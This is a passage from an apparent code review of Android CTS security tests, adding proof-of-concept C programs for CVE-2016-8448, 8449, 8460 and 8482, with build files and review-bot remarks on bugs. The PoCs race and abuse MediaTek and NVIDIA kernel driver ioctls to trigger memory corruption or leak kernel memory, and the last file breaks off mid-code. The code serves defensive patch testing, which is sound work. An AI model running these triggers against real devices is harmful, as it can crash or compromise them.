+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_INFO_H__
+#define __MTKFB_INFO_H__
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+ typedef enum {
+ DISPIF_TYPE_DBI = 0,
+ DISPIF_TYPE_DPI,
+ DISPIF_TYPE_DSI,
+ DISPIF_TYPE_DPI0,
+ DISPIF_TYPE_DPI1,
+ DISPIF_TYPE_DSI0,
+ DISPIF_TYPE_DSI1,
+ HDMI = 7,
+ HDMI_SMARTBOOK,
+ MHL,
+ DISPIF_TYPE_EPD,
+ SLIMPORT
+ } MTKFB_DISPIF_TYPE;
+
+ typedef enum {
+ MTKFB_DISPIF_PRIMARY_LCD = 0,
+ MTKFB_DISPIF_HDMI,
+ MTKFB_DISPIF_EPD,
+ MTKFB_MAX_DISPLAY_COUNT
+ } MTKFB_DISPIF_DEVICE_TYPE;
+
+ typedef enum {
+ DISPIF_FORMAT_RGB565 = 0,
+ DISPIF_FORMAT_RGB666,
+ DISPIF_FORMAT_RGB888
+ } MTKFB_DISPIF_FORMAT;
+
+
+ typedef enum {
+ DISPIF_MODE_VIDEO = 0,
+ DISPIF_MODE_COMMAND
+ } MTKFB_DISPIF_MODE;
+
+ typedef struct mtk_dispif_info {
+ unsigned int display_id;
+ unsigned int isHwVsyncAvailable;
+ MTKFB_DISPIF_TYPE displayType;
+ unsigned int displayWidth;
+ unsigned int displayHeight;
+ unsigned int displayFormat;
+ MTKFB_DISPIF_MODE displayMode;
+ unsigned int vsyncFPS;
+ unsigned int physicalWidth;
+ unsigned int physicalHeight;
+ unsigned int isConnected;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
+ unsigned int lcmOriginalWidth;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
+ unsigned int lcmOriginalHeight;
+ } mtk_dispif_info_t;
+
+#define MAKE_MTK_FB_FORMAT_ID(id, bpp) (((id) << 8) | (bpp))
+
+ typedef enum {
+ MTK_FB_FORMAT_UNKNOWN = 0,
+
+ MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
+ MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
+ MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
+ MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
+ MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
+ MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
+ MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
+ MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
+ MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
+ MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
+ MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
+ MTK_FB_FORMAT_BPP_MASK = 0xFF,
+ } MTK_FB_FORMAT;
+
+#define GET_MTK_FB_FORMAT_BPP(f) ((f) & MTK_FB_FORMAT_BPP_MASK)
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif /* __DISP_DRV_H__ */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
new file mode 100644
index 0000000..e5f675b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/mman.h>
+#include <fcntl.h>
+//#include <pthread.h>
+#include <sys/prctl.h>
+#include <unistd.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <asm-generic/ioctl.h>
+#include "mtkfb.h"
+int main(int argc, char **argv) {
+ int fd = 0;
+ struct fb_overlay_layer layerInfo;
+ memset(&layerInfo, 0, sizeof(layerInfo));
+ fd = open("/dev/graphics/fb0", O_RDWR);
+ if (fd < 0) {
+ perror("open /dev/graphics/fb0");
+ exit(-1);
+ }
+ printf("Device file opened successfully\n");
+ printf("Trying to get layer info\n");
+ if(ioctl(fd, MTKFB_GET_OVERLAY_LAYER_INFO, &layerInfo) == -1) {
+ perror("ioctl MTKFB_GET_OVERLAY_LAYER_INFO failed");
+ exit(-2);
+ }
+ printf("Got layer info\n");
+ printf("Trying to set layer info\n");
+ // set any huge value here
+ int curr_val = 0xf1111111;
+ while(1) {
+ layerInfo.layer_id = curr_val;
+ if(ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &layerInfo) == -1) {
+ perror("ioctl MTKFB_SET_OVERLAY_LAYER failed");
+ //exit(-2);
+ }
+ curr_val--;
+ if(curr_val == -1) {
+ break;
+ }
+ }
+ printf("Set layer info\n");
+ return 0;
+}
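Review bot: The `while(1)` loop in `main` can only reach its exit test `curr_val == -1` through signed overflow, because `int curr_val = 0xf1111111;` already holds a negative value and is then decremented. That is undefined behaviour in C, and where it happens to wrap it means roughly four billion ioctl calls before the test returns. An unsigned counter with an explicit cap keeps the run defined and bounded, e.g. `unsigned int curr_val = 0xf1111111u;` and `for (tries = 0; tries < MAX_TRIES; tries++, curr_val--)`, where `MAX_TRIES` is a constant the author would choose. `ioctl()` is also called with only `<asm-generic/ioctl.h>` included, which supplies the request macros but no prototype, so `#include <sys/ioctl.h>` is needed unless `mtkfb.h` pulls it in. The descriptor is never closed, and the exit status is 0 whether or not any `MTKFB_SET_OVERLAY_LAYER` call was accepted.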
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
new file mode 100644
index 0000000..ce1e1bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8449
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
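Review bot: The four `CFLAGS +=` lines and `LDFLAGS += -rdynamic` assign plain make variables, which the Android module rules do not read as far as I know, so `-D_FORTIFY_SOURCE=2`, `-fPIE` and the warning set probably never reach the compiler for this module. Since `include $(CLEAR_VARS)` only resets `LOCAL_*` variables, the `+=` form would also keep growing one global value across every Android.mk that is parsed. Use the module-scoped names instead, e.g. `LOCAL_CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement` and `LOCAL_LDFLAGS += -rdynamic`, and expect the poc.c files to need cleanup once the warnings are live. The same applies to the Android.mk files added for CVE-2016-8460 (which uses `CFLAGS :=` on its first line), CVE-2016-8482, CVE-2016-9120, CVE-2017-0403 and CVE-2017-0404.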
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
new file mode 100755
index 0000000..1e76b55
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
@@ -0,0 +1,143 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/tegra_avpchannel"
+
+#define NVAVP_IOCTL_MAGIC 'n'
+
+struct nvavp_channel_open_args {
+ __u32 channel_fd;
+};
+
+#define NVAVP_IOCTL_CHANNEL_OPEN _IOR(NVAVP_IOCTL_MAGIC, 0x73, \
+ struct nvavp_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvavp_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV, O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ LOG("[+] open OK");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ ERR("[-] create close thread %d failed", i);
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ LOG("[+] %03d times", i);
+ /* open */
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+ //usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
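Review bot: `main` returns 0 on every path: when `open(DEV, O_RDONLY)` fails, when the first `ioctl` fails and jumps to `out_dev`, and after the `TRY_TIMES` loop completes. Whatever launches this binary therefore cannot tell a device without `/dev/tegra_avpchannel` from a run that actually exercised the driver. Return a distinct non-zero status on the setup failures, e.g. `return EXIT_FAILURE;` after `ERR("[-] open failed");`, and add a comment above `main` stating which observable outcome the test treats as a pass. `try_time` is initialised from `TRY_TIMES` but never read, and `int main()` should be `int main(void)` if `-Wstrict-prototypes` is meant to be enforced. `attack` and `target_fd` are shared between threads through `volatile` only, which gives no inter-thread ordering guarantee.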
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
new file mode 100644
index 0000000..b9c51d1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8460
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS := -Wall -W -g -O2 -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
new file mode 100755
index 0000000..78d41e5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_pin_handle {
+ __u32 *handles; /* array of handles to pin/unpin */
+ unsigned long *addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_pin_handle_32 {
+ __u32 handles; /* array of handles to pin/unpin */
+ __u32 addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_map_caller_32 {
+ __u32 handle; /* nvmap handle */
+ __u32 offset; /* offset into hmem; should be page-aligned */
+ __u32 length; /* number of bytes to map */
+ __u32 flags; /* maps as wb/iwb etc. */
+ __u32 addr; /* user pointer*/
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PIN_MULT _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_PIN_MULT_32 _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
+#define NVMAP_IOC_MMAP_32 _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+
+int g_fd = -1;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ return g_fd;
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ int i;
+ int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(handles, 0x42, 0x1000);
+ for (i = 0; i < 2; ++i) {
+ struct nvmap_create_handle op = {0};
+ op.size = 0x1000;
+ ioctl(g_fd, NVMAP_IOC_CREATE, &op);
+ handles[i] = op.handle;
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.handle = op.handle;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+ }
+
+ void* leak_addr = (void*) 0x10001000;
+ void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(leak_addr, 0x41, 0x1000);
+
+ unsigned long leaked_data = 0;
+ struct nvmap_pin_handle_32 pin = {0};
+ pin.count = 2;
+ pin.handles = (unsigned int) handles;
+ struct nvmap_pin_handle err_pin = {0};
+ err_pin.count = 0;
+ err_pin.handles = handles;
+ err_pin.addr = leak_addr + 8;
+
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin); // construct op.addr
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);
+
+ for (i = 0; i < 10; ++i) {
+ if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
+ leaked_data = (unsigned long)((int*)leak_addr) + i;
+ }
+ }
+
+ if (leaked_data) {
+ printf("Vulnerable");
+ }
+ return 0;
+}
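Review bot: Both `mmap` calls in `main` are used without comparing the result to `MAP_FAILED`, so a refused mapping becomes a crash in the following `memset` instead of a reported setup error. Add `if (handles == MAP_FAILED) { perror("mmap"); return -1; }`, and the same check on `mmap_addr`, which is otherwise unused. `MAP_FIXED` at the hard-coded addresses also silently replaces anything already mapped there. Every `ioctl` return value is ignored, and the process exits 0 whether or not it printed `Vulnerable` (which has no trailing newline), so the verdict depends entirely on the caller parsing stdout. With `LOCAL_MULTILIB := both`, `pin.handles = (unsigned int) handles;` narrows a pointer on the 64-bit build; `(unsigned int)(uintptr_t)handles` makes that explicit.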
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
new file mode 100644
index 0000000..b41fb16
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8482
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
new file mode 100644
index 0000000..41862a5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
@@ -0,0 +1,205 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+#define NVHOST_IOCTL_MAGIC 'H'
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%d\n", errno, errno);
+ }
+ return ret;
+}
+
+struct nvhost_submit_args {
+ __u32 submit_version;
+ __u32 num_syncpt_incrs;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 timeout;
+ __u32 flags;
+ __u32 fence; /* Return value */
+ __u64 syncpt_incrs;
+ __u64 cmdbuf_exts;
+
+ __u64 pad[3]; /* future expansion */
+
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 reloc_shifts;
+ __u64 waitchks;
+ __u64 waitbases;
+ __u64 class_ids;
+ __u64 fences;
+};
+#define NVHOST_IOCTL_CHANNEL_SUBMIT \
+ _IOWR(NVHOST_IOCTL_MAGIC, 26, struct nvhost_submit_args)
+
+struct nvhost_syncpt_incr {
+ __u32 syncpt_id;
+ __u32 syncpt_incrs;
+};
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define VICDEV "/dev/nvhost-vic"
+#define SYNC_NUM 1
+struct nvhost_set_error_notifier err1 = { 0 }, err2 = { 0 };
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, vic;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ int ret;
+ set_affinity(1);
+
+ while(attack){
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &err1);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvmap_alloc_handle alloc = {
+ .heap_mask = 0xFFFFFFFF
+ };
+
+ struct nvhost_syncpt_incr incr[SYNC_NUM];
+
+ struct nvhost_submit_args submit = {
+ .num_syncpt_incrs = SYNC_NUM,
+ .syncpt_incrs = (intptr_t)incr,
+ .timeout = 1,
+ //.class_ids = (intptr_t)&ret
+ };
+
+ memset(incr, 0, sizeof(incr));
+ incr[0].syncpt_id = 6;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1)
+ ERR("[-] open %s failed", NVMAPDEV);
+ else
+ LOG("[+] open %s OK", NVMAPDEV);
+
+ vic = open(VICDEV, O_RDONLY);
+ if(vic == -1)
+ ERR("[-] open %s failed", VICDEV);
+ else
+ LOG("[+] open %s OK", VICDEV);
+
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_CREATE failed");
+ else
+ LOG("[+] NVMAP_IOC_CREATE succeeded, fd = %d", args.handle);
+
+ dma1 = args.handle;
+ err1.mem = dma1;
+ alloc.handle = dma1;
+
+ ret = ioctl(nvmap, NVMAP_IOC_ALLOC, &alloc);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_ALLOC failed");
+ else
